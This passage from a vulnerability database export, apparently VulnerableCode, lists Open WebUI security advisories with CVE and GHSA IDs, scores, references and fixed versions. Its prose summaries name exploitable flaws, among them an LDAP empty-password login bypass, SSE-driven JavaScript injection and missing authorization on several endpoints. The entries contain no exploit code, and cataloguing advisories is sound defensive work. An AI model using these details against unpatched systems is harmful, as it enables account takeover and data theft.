vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-8nzh-cpda-dkca
13
vulnerability VCID-8y4k-pj2n-8uhm
14
vulnerability VCID-chug-ma8r-cucc
15
vulnerability VCID-cw4k-3s8z-uqh8
16
vulnerability VCID-dz6g-jgmg-wqce
17
vulnerability VCID-dzh3-rqx4-fqhv
18
vulnerability VCID-ef1t-pxjm-j7cz
19
vulnerability VCID-hj5f-yk3y-ffdg
20
vulnerability VCID-jfs9-dps1-27a2
21
vulnerability VCID-n4ma-zcpv-5fbp
22
vulnerability VCID-nxvm-97r4-6ybz
23
vulnerability VCID-pkds-1xgn-q3bv
24
vulnerability VCID-q682-k826-efhv
25
vulnerability VCID-qgfh-7u8n-y7c7
26
vulnerability VCID-qjt1-zxx8-r7ht
27
vulnerability VCID-r7vt-4bqm-f7hb
28
vulnerability VCID-reqw-pfm8-c7g5
29
vulnerability VCID-rhhj-rccv-87hw
30
vulnerability VCID-s625-eg1w-gfd1
31
vulnerability VCID-t571-d65a-cyb2
32
vulnerability VCID-vghe-uuzj-m7cu
33
vulnerability VCID-vkx3-71kv-sugt
34
vulnerability VCID-w2vd-r3hr-w3bt
35
vulnerability VCID-wcz4-vwx4-tufb
36
vulnerability VCID-yug9-shts-kufb
37
vulnerability VCID-yysb-dk2k-f7g4
38
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.11
aliases CVE-2026-45666, GHSA-x3qm-p8hr-3c3h
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k9jf-5jzd-pkge
41
url VCID-mn21-kwuu-w7by
vulnerability_id VCID-mn21-kwuu-w7by
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.19, there's an IDOR in the channels message management system that allows authenticated users to modify or delete any message within channels they have read access to. The vulnerability exists in the message update and delete endpoints, which implement channel-level authorization but completely lack message ownership validation. While the frontend correctly implements ownership checks (showing edit/delete buttons only for message owners or admins), the backend APIs bypass these protections by only validating channel access permissions without verifying that the requesting user owns the target message. This creates a client-side security control bypass where attackers can directly call the APIs to modify other users' messages. This vulnerability is fixed in 0.6.19.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44569
reference_id
reference_type
scores
0
value 0.00036
scoring_system epss
scoring_elements 0.11225
published_at 2026-06-12T12:55:00Z
1
value 0.00036
scoring_system epss
scoring_elements 0.11183
published_at 2026-06-14T12:55:00Z
2
value 0.00036
scoring_system epss
scoring_elements 0.1116
published_at 2026-06-11T12:55:00Z
3
value 0.00036
scoring_system epss
scoring_elements 0.11217
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44569
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44569
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44569
3
reference_url https://github.com/advisories/GHSA-jxwr-g6r6-j3fx
reference_id GHSA-jxwr-g6r6-j3fx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jxwr-g6r6-j3fx
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jxwr-g6r6-j3fx
reference_id GHSA-jxwr-g6r6-j3fx
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:48:54Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jxwr-g6r6-j3fx
fixed_packages
0
url pkg:pypi/open-webui@0.6.19
purl pkg:pypi/open-webui@0.6.19
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7j5a-pu4k-kucf
17
vulnerability VCID-7nbc-ng1s-suck
18
vulnerability VCID-8n6u-wgz9-1bgj
19
vulnerability VCID-8nzh-cpda-dkca
20
vulnerability VCID-8y4k-pj2n-8uhm
21
vulnerability VCID-94nj-qkdf-xfhn
22
vulnerability VCID-9jud-sr2a-8yc3
23
vulnerability VCID-chug-ma8r-cucc
24
vulnerability VCID-cw4k-3s8z-uqh8
25
vulnerability VCID-dz6g-jgmg-wqce
26
vulnerability VCID-dzh3-rqx4-fqhv
27
vulnerability VCID-ef1t-pxjm-j7cz
28
vulnerability VCID-hj5f-yk3y-ffdg
29
vulnerability VCID-jfs9-dps1-27a2
30
vulnerability VCID-jnsg-u9dy-r3d5
31
vulnerability VCID-k9jf-5jzd-pkge
32
vulnerability VCID-n4ma-zcpv-5fbp
33
vulnerability VCID-nxvm-97r4-6ybz
34
vulnerability VCID-pkds-1xgn-q3bv
35
vulnerability VCID-pvep-chj7-ekeg
36
vulnerability VCID-pwsg-72yy-quhk
37
vulnerability VCID-q682-k826-efhv
38
vulnerability VCID-qgfh-7u8n-y7c7
39
vulnerability VCID-qjt1-zxx8-r7ht
40
vulnerability VCID-r7vt-4bqm-f7hb
41
vulnerability VCID-reqw-pfm8-c7g5
42
vulnerability VCID-rhhj-rccv-87hw
43
vulnerability VCID-s625-eg1w-gfd1
44
vulnerability VCID-t571-d65a-cyb2
45
vulnerability VCID-u25g-p4nx-gqd1
46
vulnerability VCID-ujye-g4rj-8be5
47
vulnerability VCID-um53-kf7u-kkg6
48
vulnerability VCID-vghe-uuzj-m7cu
49
vulnerability VCID-vkx3-71kv-sugt
50
vulnerability VCID-w2vd-r3hr-w3bt
51
vulnerability VCID-wb88-83cj-ffhy
52
vulnerability VCID-wcz4-vwx4-tufb
53
vulnerability VCID-yug9-shts-kufb
54
vulnerability VCID-yysb-dk2k-f7g4
55
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.19
aliases CVE-2026-44569, GHSA-jxwr-g6r6-j3fx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mn21-kwuu-w7by
42
url VCID-n4ma-zcpv-5fbp
vulnerability_id VCID-n4ma-zcpv-5fbp
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the POST /api/v1/models/import endpoint allows users with the workspace.models_import permission to overwrite any existing model in the database, regardless of ownership. When an imported model's ID matches an existing model, the endpoint merges the attacker's payload over the existing model data and writes it to the database with no ownership or access grant validation. Additionally, filter_allowed_access_grants is never called, bypassing the access grant restrictions enforced on all other model mutation endpoints. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44562
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01322
published_at 2026-06-14T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01311
published_at 2026-06-11T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.01318
published_at 2026-06-13T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01307
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44562
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44562
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44562
3
reference_url https://github.com/advisories/GHSA-mqq6-cqcx-38vg
reference_id GHSA-mqq6-cqcx-38vg
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-mqq6-cqcx-38vg
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-mqq6-cqcx-38vg
reference_id GHSA-mqq6-cqcx-38vg
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:14:39Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-mqq6-cqcx-38vg
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44562, GHSA-mqq6-cqcx-38vg
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-n4ma-zcpv-5fbp
43
url VCID-nxvm-97r4-6ybz
vulnerability_id VCID-nxvm-97r4-6ybz
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the type: "file" (non-full-context), type: "text" with collection_name, and bare collection_name/collection_names paths in the get_sources_from_items function perform vector store queries without any authorization check, allowing users to extract content from files and knowledge bases they do not have access to. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44560
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44560
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44560
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44560
3
reference_url https://github.com/advisories/GHSA-h36f-rqpx-j5wx
reference_id GHSA-h36f-rqpx-j5wx
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-h36f-rqpx-j5wx
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-h36f-rqpx-j5wx
reference_id GHSA-h36f-rqpx-j5wx
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:09:48Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-h36f-rqpx-j5wx
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44560, GHSA-h36f-rqpx-j5wx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-nxvm-97r4-6ybz
44
url VCID-pkds-1xgn-q3bv
vulnerability_id VCID-pkds-1xgn-q3bv
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the LDAP authentication endpoint does not validate that the submitted password is non-empty before performing a Simple Bind against the LDAP server. The LdapForm Pydantic model accepts password: str with no minimum length constraint, so an empty string passes validation. The subsequent Connection.bind() call succeeds on vulnerable LDAP servers, and the application issues a full session token for the target user. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44551
reference_id
reference_type
scores
0
value 0.02638
scoring_system epss
scoring_elements 0.86097
published_at 2026-06-14T12:55:00Z
1
value 0.02638
scoring_system epss
scoring_elements 0.86039
published_at 2026-06-11T12:55:00Z
2
value 0.02638
scoring_system epss
scoring_elements 0.861
published_at 2026-06-13T12:55:00Z
3
value 0.02638
scoring_system epss
scoring_elements 0.86089
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44551
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44551
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44551
3
reference_url https://github.com/advisories/GHSA-2r4p-jpmg-48f4
reference_id GHSA-2r4p-jpmg-48f4
reference_type
scores
0
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-2r4p-jpmg-48f4
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-2r4p-jpmg-48f4
reference_id GHSA-2r4p-jpmg-48f4
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value CRITICAL
scoring_system cvssv3.1_qr
scoring_elements
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-18T14:33:19Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-2r4p-jpmg-48f4
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44551, GHSA-2r4p-jpmg-48f4
risk_score 4.5
exploitability 0.5
weighted_severity 9.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pkds-1xgn-q3bv
45
url VCID-pvep-chj7-ekeg
vulnerability_id VCID-pvep-chj7-ekeg
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Versions 0.6.224 and prior contain a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker's malicious model URL, achievable through social engineering of the admin and subsequent users. This issue is fixed in version 0.6.35.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-64496
reference_id
reference_type
scores
0
value 0.00113
scoring_system epss
scoring_elements 0.29674
published_at 2026-06-14T12:55:00Z
1
value 0.00121
scoring_system epss
scoring_elements 0.30843
published_at 2026-06-13T12:55:00Z
2
value 0.00121
scoring_system epss
scoring_elements 0.30826
published_at 2026-06-12T12:55:00Z
3
value 0.00121
scoring_system epss
scoring_elements 0.30627
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-64496
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca
reference_id 8af6a4cf21b756a66cd58378a01c60f74c39b7ca
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-11-13T21:37:56Z/
url https://github.com/open-webui/open-webui/commit/8af6a4cf21b756a66cd58378a01c60f74c39b7ca
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-64496
reference_id CVE-2025-64496
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-64496
4
reference_url https://github.com/advisories/GHSA-cm35-v4vp-5xvx
reference_id GHSA-cm35-v4vp-5xvx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-cm35-v4vp-5xvx
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx
reference_id GHSA-cm35-v4vp-5xvx
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-11-13T21:37:56Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-cm35-v4vp-5xvx
fixed_packages
0
url pkg:pypi/open-webui@0.6.35
purl pkg:pypi/open-webui@0.6.35
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7nbc-ng1s-suck
17
vulnerability VCID-8n6u-wgz9-1bgj
18
vulnerability VCID-8nzh-cpda-dkca
19
vulnerability VCID-8y4k-pj2n-8uhm
20
vulnerability VCID-94nj-qkdf-xfhn
21
vulnerability VCID-9jud-sr2a-8yc3
22
vulnerability VCID-chug-ma8r-cucc
23
vulnerability VCID-cw4k-3s8z-uqh8
24
vulnerability VCID-dz6g-jgmg-wqce
25
vulnerability VCID-dzh3-rqx4-fqhv
26
vulnerability VCID-ef1t-pxjm-j7cz
27
vulnerability VCID-hj5f-yk3y-ffdg
28
vulnerability VCID-jfs9-dps1-27a2
29
vulnerability VCID-k9jf-5jzd-pkge
30
vulnerability VCID-n4ma-zcpv-5fbp
31
vulnerability VCID-nxvm-97r4-6ybz
32
vulnerability VCID-pkds-1xgn-q3bv
33
vulnerability VCID-pwsg-72yy-quhk
34
vulnerability VCID-q682-k826-efhv
35
vulnerability VCID-qgfh-7u8n-y7c7
36
vulnerability VCID-qjt1-zxx8-r7ht
37
vulnerability VCID-r7vt-4bqm-f7hb
38
vulnerability VCID-reqw-pfm8-c7g5
39
vulnerability VCID-rhhj-rccv-87hw
40
vulnerability VCID-s625-eg1w-gfd1
41
vulnerability VCID-t571-d65a-cyb2
42
vulnerability VCID-u25g-p4nx-gqd1
43
vulnerability VCID-ujye-g4rj-8be5
44
vulnerability VCID-um53-kf7u-kkg6
45
vulnerability VCID-vghe-uuzj-m7cu
46
vulnerability VCID-vkx3-71kv-sugt
47
vulnerability VCID-w2vd-r3hr-w3bt
48
vulnerability VCID-wb88-83cj-ffhy
49
vulnerability VCID-wcz4-vwx4-tufb
50
vulnerability VCID-yug9-shts-kufb
51
vulnerability VCID-yysb-dk2k-f7g4
52
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.35
aliases CVE-2025-64496, GHSA-cm35-v4vp-5xvx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pvep-chj7-ekeg
46
url VCID-pwsg-72yy-quhk
vulnerability_id VCID-pwsg-72yy-quhk
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.6, there is a vulnerability in the chat completion API which allows attackers to bypass tool restrictions, potentially enabling unauthorized actions or access. In the chat_completion API, the parameters tool_ids and tool_servers are supplied by the user. These parameters are used by the middleware to create a tools_dict, which is then used by get_tool_by_id to retrieve the appropriate tool. However, there is no check ensuring that the user calling the API has permission to use the tool, meaning that a user can invoke any server tool by supplying the correct tool_id or tool_servers parameters via the chat completion API. Moreover, the authentication token stored on the server is used when invoking the tool, so the tool is invoked with the server's privileges. This vulnerability is fixed in 0.8.6.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45350
reference_id
reference_type
scores
0
value 0.00044
scoring_system epss
scoring_elements 0.14156
published_at 2026-06-13T12:55:00Z
1
value 0.00044
scoring_system epss
scoring_elements 0.1413
published_at 2026-06-14T12:55:00Z
2
value 0.00044
scoring_system epss
scoring_elements 0.14042
published_at 2026-06-11T12:55:00Z
3
value 0.00044
scoring_system epss
scoring_elements 0.14159
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45350
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/4737e1f11
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/4737e1f11
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.6
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45350
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45350
5
reference_url https://github.com/advisories/GHSA-4pcg-253r-rf9w
reference_id GHSA-4pcg-253r-rf9w
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-4pcg-253r-rf9w
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-4pcg-253r-rf9w
reference_id GHSA-4pcg-253r-rf9w
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:18:20Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-4pcg-253r-rf9w
fixed_packages
0
url pkg:pypi/open-webui@0.8.6
purl pkg:pypi/open-webui@0.8.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4v8w-kv6g-kkbc
7
vulnerability VCID-4x63-8x64-d3bq
8
vulnerability VCID-5319-t7jm-y3bx
9
vulnerability VCID-5jna-wvd7-j7cm
10
vulnerability VCID-5wfg-zqcy-c7ar
11
vulnerability VCID-5wzn-mfwg-ybc3
12
vulnerability VCID-6rbm-rm25-hqgy
13
vulnerability VCID-8nzh-cpda-dkca
14
